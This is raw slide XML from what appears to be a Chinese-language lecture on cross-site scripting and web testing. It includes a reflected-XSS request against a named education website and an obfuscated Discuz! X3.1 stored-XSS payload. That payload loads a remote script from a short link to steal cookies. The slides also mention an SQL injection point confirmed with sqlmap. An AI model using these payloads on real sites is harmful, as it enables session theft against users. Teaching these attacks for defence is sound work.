                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="32"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="307" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="309" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="305" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="306" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="308" grpId="5"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3211512" y="3629817"/>
            <a:ext cx="1028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类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="image34.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="20005651">
            <a:off x="4179887" y="3214686"/>
            <a:ext cx="2155827" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="314" name="image35.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4418012" y="3806825"/>
            <a:ext cx="1684339" cy="350839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="315" name="image36.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1448057">
            <a:off x="4202112" y="4535487"/>
            <a:ext cx="2109789" cy="352427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Shape 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6410325" y="2632074"/>
            <a:ext cx="2171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反射型xss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Shape 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6410325" y="3614736"/>
            <a:ext cx="2171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存储型xss</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Shape 318"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6425203" y="4786311"/>
            <a:ext cx="35945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DOM Based XSS</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543700" y="731836"/>
            <a:ext cx="240074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反射型XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Shape 321"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1320209" y="1877218"/>
            <a:ext cx="11166478"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反射型xss只是简单的把用户的输入的数据“反射”给浏览器。也就是说，黑客往往需要诱使用户“点击”一个恶意链接，才能攻击成功。反射型xss也叫做“非持久型xss”。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1282775" y="5213349"/>
            <a:ext cx="735314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前文刚介绍的就是典型的反射型XSS</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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="320"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="100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21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="321"/>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2" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="322"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="18"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P build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="321" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="322" grpId="3"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768299" y="152398"/>
            <a:ext cx="8391957"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800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>再比如这段时间我们在监测的一个网站：中国教育云</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>搜索栏一枚XSS：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2800">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>http://yun.zjer.cn/index.php?r=portal/find/School</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277694" y="1939130"/>
            <a:ext cx="1044941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atin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>GET /index.php?keywords=test%27;alert(1);var%20i=%271&amp;orgacage=0&amp;page=2&amp;r=portal/find/School&amp;sel_area_area_address=&amp;sel_area_city_address=&amp;sel_area_province_address=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="image37.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534321" y="2836861"/>
            <a:ext cx="7262780" cy="5872035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="image38.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507803" y="3415065"/>
            <a:ext cx="10912790" cy="42494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24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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325"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="10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326"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32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 grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="327"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="324" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="326" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="327" grpId="4"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422845" y="2890836"/>
            <a:ext cx="240074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存储型XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224755" y="3672680"/>
            <a:ext cx="11166478"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存储型xss会把用户输入的数据“存储”在服务端。这种xss具有很强的稳定性。</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29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="329"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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30"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13"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9" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="330" grpId="2"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608868" y="577849"/>
            <a:ext cx="509416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j-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Discuz! X3.1 储存型XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005610" y="1866899"/>
            <a:ext cx="9821593"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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>直接发帖：ed2k://|file|lovely|'+document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62))+'|test/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="334" name="image3.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085850" y="4552948"/>
            <a:ext cx="6847528" cy="37798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32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="332"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="333"/>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334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="334"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1250" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="334" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="33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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5578325" y="603249"/>
            <a:ext cx="232439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2.网站检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550861" y="1625599"/>
            <a:ext cx="56007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手工测试发现一枚注入点：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707896" y="2432050"/>
            <a:ext cx="10065259"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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://192.168.166.208:808/neirong.aspx?id=216</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347636" y="4508498"/>
            <a:ext cx="623575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使用Salmap辅助测试、验证：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="image2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="5480050"/>
            <a:ext cx="10210800" cy="914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47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">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48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="7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4" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="10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50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24"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5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="box(out)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="48" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="51" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="49" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="47" grpId="1"/>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815110" y="1003300"/>
            <a:ext cx="9821593" cy="386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300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>等用户访问并在访问的时候自动执行以下代码：   document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,105,115,46,103,100,47,53,65,110,75,76,88,62,60,47,115,99,114,105,112,116,62));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>即先将字符串转换为逐个的ASCII码，之后在用String.fromCharCode转回字符串，以躲避一些过滤。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2300">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>即将：document.write(&lt;script src=http://is.gd/5AnKLX&gt;&lt;/script&gt;);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749095" y="5130799"/>
            <a:ext cx="350123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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>接着就能获得用户Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="338" name="image4.tif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
